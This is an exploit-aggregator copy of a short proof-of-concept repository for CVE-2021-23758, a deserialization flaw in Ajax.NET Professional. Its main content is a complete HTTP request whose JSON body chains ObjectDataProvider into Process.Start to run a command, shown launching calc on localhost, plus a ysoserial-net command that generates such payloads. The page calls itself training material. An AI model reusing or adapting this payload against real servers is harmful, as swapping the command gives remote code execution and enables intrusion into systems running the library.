Share
## https://sploitus.com/exploit?id=9C5F7BCE-0D32-524F-AFDE-810763D8D028
# CVE-2021-23758-POC


this repo has been created for training on the vulnerability in the ajaxpro. disclosed with the ID number CVE-2021-23758.


# POC 

```
POST /ajaxpro/CVE_2021_23758_POC.demo,CVE_2021_23758.ashx HTTP/2
Host: localhost:44375
Content-Length: 567
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: TestAjax
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

{"obj":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd",
			"Arguments":"/c calc"
        }
    }
}}
```

```
ysoserial-net -g ObjectDataProvider -f JavaScriptSerializer -c "calc" -o raw
```

![Back-Code](img/repo.jpg?raw=true "B-Code")

![Code](img/code.jpg?raw=true "Code")

![Exploit](img/calc.jpg?raw=true "Calc")


# Reference
 * [2021-23758 Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23758)
 * [michaelschwarz/Ajax.NET-Professional](https://github.com/michaelschwarz/Ajax.NET-Professional)
 * [Details](https://mp.weixin.qq.com/s/7y-iyMMZAoN4B2dGvCFvXg)
 * [sirifu4k1 tweet](https://twitter.com/sirifu4k1/status/1470647490546393089)
 * [ysoserial](https://github.com/pwntester/ysoserial.net)